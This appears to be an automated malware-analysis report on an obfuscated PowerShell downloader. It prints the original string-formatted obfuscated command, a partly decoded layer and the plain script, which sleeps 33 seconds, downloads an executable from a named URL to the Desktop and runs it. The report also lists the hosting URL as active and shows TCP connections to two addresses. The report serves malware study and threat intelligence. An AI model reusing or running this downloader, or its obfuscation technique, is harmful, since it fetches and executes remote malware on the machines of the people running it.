

Layer 1 - Obfuscation type: String-Based


. ((GeT-variAbLe '*mDr*').NAMe[3,11,2]-jOin'') ( ((("{15}{39}{2}{45}{56}{21}{5}{49}{34}{18}{23}{62}{17}{37}{12}{41}{44}{26}{38}{46}{14}{11}{0}{4}{58}{57}{40}{42}{31}{61}{8}{60}{16}{29}{13}{47}{50}{20}{54}{9}{33}{24}{30}{3}{32}{53}{36}{48}{6}{59}{35}{52}{43}{22}{28}{25}{27}{55}{1}{7}{19}{10}{51}" -f'pATh(g','ess5','7d0m','/','GJDesktopgG','E]','GJ','l4','gGJ) gGJSy','FilE','.e','foLDER','e','t.WebClien','T','De','tem.','g','NtgG','154073','wN','yP','exegGJ);&(gGJ','J ; &(gGJslg','KE(','J+gGJrt-Pr','Des} = De','ocess','StagG','Ne','gGJhttp:/','GJ+','sunyst.','.iNVo','ENVIronmE','eYDess5l','G','GJe','Y7d0mk6','Y','GJNew','pgGJ) 33;DeY','-g','4073.','{','K6 ','::gE','tgGJ)','J,g','gGJ','.do','xe','415','co/dfmg','LoaD','gGJ) DeYD','= [T','&(g','J);(','D','s','gGJObject','GJ+'))  -CREPlaCe'DeY',[Char]36-replaCE  's5l',[Char]92-CREPlaCe([Char]103+[Char]71+[Char]74),[Char]39))





Layer 2 - Obfuscation type: String-Based


$7d0mK6 = [TyPE]'ENVIronmENt' ; &('sl'+'eep') 33;${Des} = $7d0mk6::gETfoLDERpATh('Desktop');(&('New-'+'Object') 'System.Net.WebClient').dowNLoaDFilE.iNVoKE('http://sunyst.co/dfm','$Des\4154073.exe');&('Sta'+'rt-Process') $Des\4154073.exe





Layer 3 - Plainscript


$7d0mK6 = [TyPE]'ENVIronmENt' ; sleep 33;${Des} = $7d0mk6::gETfoLDERpATh('Desktop');(New-Object 'System.Net.WebClient').dowNLoaDFilE.iNVoKE('http://sunyst.co/dfm','$Des\4154073.exe');Start-Process $Des\4154073.exe




Active Malware Hosting URLs:

http://sunyst.co/dfm



Down Malware Hosting URLs:



Execution Report:

Script attempts to sleep for 33 seconds



TCP Connections info:


      State LocalEndPoint   RemoteEndPoint 
      ----- -------------   -------------- 
Established 10.0.2.15:55821 31.199.53.9:80 
Established 10.0.2.15:55822 31.199.53.11:80


